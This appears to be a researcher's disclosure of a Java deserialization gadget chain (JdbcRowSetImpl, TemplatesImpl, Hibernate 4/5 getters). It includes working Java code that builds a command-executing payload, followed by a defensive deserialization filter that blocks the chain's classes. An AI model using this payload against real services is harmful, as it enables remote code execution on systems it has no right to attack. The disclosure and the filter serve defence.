Hi, I'm redrain (rootredrain@gmail.com). I found a vulnerability involving deserialization, and nobody has reported it to the official project.

JdbcRowSetImpl is the standard implementation of the JdbcRowSet interface, and the class com.sun.rowset.JdbcRowSetImpl is serializable. We can use the class TemplatesImpl to store the command as bytecode; when the getter is intercepted, the custom bytecode is invoked. Hibernate 4 can only call getters, so there are two payloads to use:
```java
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;

// Hibernate 4: wrap the TemplatesImpl getter in a BasicPropertyAccessor$BasicGetter
public static Object makeHibernate4Getter ( Class<?> tplClass, String method ) throws ClassNotFoundException, NoSuchMethodException,
        SecurityException, InstantiationException, IllegalAccessException, IllegalArgumentException, InvocationTargetException {
    Class<?> getterIf = Class.forName("org.hibernate.property.Getter");
    Class<?> basicGetter = Class.forName("org.hibernate.property.BasicPropertyAccessor$BasicGetter");
    // BasicGetter's constructor is not public, so it is opened up via reflection
    Constructor<?> bgCon = basicGetter.getDeclaredConstructor(Class.class, Method.class, String.class);
    bgCon.setAccessible(true);
    if ( !method.startsWith("get") ) {
        throw new IllegalArgumentException("Hibernate4 can only call getters");
    }
    // derive the bean property name from the getter name, e.g. getOutputProperties -> outputProperties
    String propName = Character.toLowerCase(method.charAt(3)) + method.substring(4);
    Object g = bgCon.newInstance(tplClass, tplClass.getDeclaredMethod(method), propName);
    // the getter is handed over as a one-element array of the Getter interface type
    Object arr = Array.newInstance(getterIf, 1);
    Array.set(arr, 0, g);
    return arr;
}

// Hibernate 5: same idea, with the relocated Getter interface and the public GetterMethodImpl constructor
public static Object makeHibernate5Getter ( Class<?> tplClass, String method ) throws NoSuchMethodException, SecurityException,
        ClassNotFoundException, InstantiationException, IllegalAccessException, IllegalArgumentException, InvocationTargetException {
    Class<?> getterIf = Class.forName("org.hibernate.property.access.spi.Getter");
    Class<?> basicGetter = Class.forName("org.hibernate.property.access.spi.GetterMethodImpl");
    Constructor<?> bgCon = basicGetter.getConstructor(Class.class, String.class, Method.class);
    Object g = bgCon.newInstance(tplClass, "test", tplClass.getDeclaredMethod(method));
    Object arr = Array.newInstance(getterIf, 1);
    Array.set(arr, 0, g);
    return arr;
}
```
Here is some simple code to create the payload object:
```java
// Gadgets.createTemplatesImpl, makeGetter and makeCaller are helpers from the surrounding payload class (not shown here)
public Object getObject ( String command ) throws Exception {
    // TemplatesImpl instance carrying the command as bytecode
    Object tpl = Gadgets.createTemplatesImpl(command);
    // getter that Hibernate will invoke on it during deserialization
    Object getters = makeGetter(tpl.getClass(), "getOutputProperties");
    return makeCaller(tpl, getters);
}
```
Finally, calling the bytecode triggers the exploit. I would be glad to report it.
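A deserialization filter that rejects the classes this chain depends on, as an added defensive example (not code from the report above). It assumes Java 9 or later for java.io.ObjectInputFilter; the pattern string, the depth bound and the sample payload are constructed for this example.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.List;

public class GadgetChainFilter {
    // JEP 290 pattern (constructed here): reject the entry class, the bytecode carrier and the
    // Hibernate getter classes used above, and bound object-graph depth. Classes that match
    // nothing stay UNDECIDED, i.e. are accepted, so in production this denylist sits under an
    // allowlist of the types the endpoint actually expects.
    static final String PATTERN = String.join(";",
        "!com.sun.rowset.JdbcRowSetImpl",
        "!com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
        "!org.hibernate.**",          // covers both the Hibernate 4 and Hibernate 5 Getter types
        "maxdepth=20");
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(PATTERN);

    // Ask the filter about a class the way ObjectInputStream does during readObject()
    static ObjectInputFilter.Status statusFor(Class<?> clazz) {
        return FILTER.checkInput(new ObjectInputFilter.FilterInfo() {
            public Class<?> serialClass() { return clazz; }
            public long arrayLength() { return -1; }
            public long depth() { return 1; }
            public long references() { return 0; }
            public long streamBytes() { return 0; }
        });
    }

    // Deserialize untrusted bytes with the filter installed on this stream only
    static Object readFiltered(byte[] data) throws Exception {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data))) {
            in.setObjectInputFilter(FILTER);
            return in.readObject();   // throws InvalidClassException when the filter rejects a class
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed benign payload: a List<String>, which matches no pattern and is accepted
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) { out.writeObject(List.of("ok")); }
        System.out.println("accepted: " + readFiltered(bos.toByteArray()));

        // Filter decision for the chain's entry class, checked by name without building an instance
        System.out.println("JdbcRowSetImpl -> " + statusFor(Class.forName("com.sun.rowset.JdbcRowSetImpl")));
    }
}
```

A REJECTED decision surfaces as an InvalidClassException from readObject; logging those exceptions with the offending class name gives a cheap detection signal for attempts against this chain.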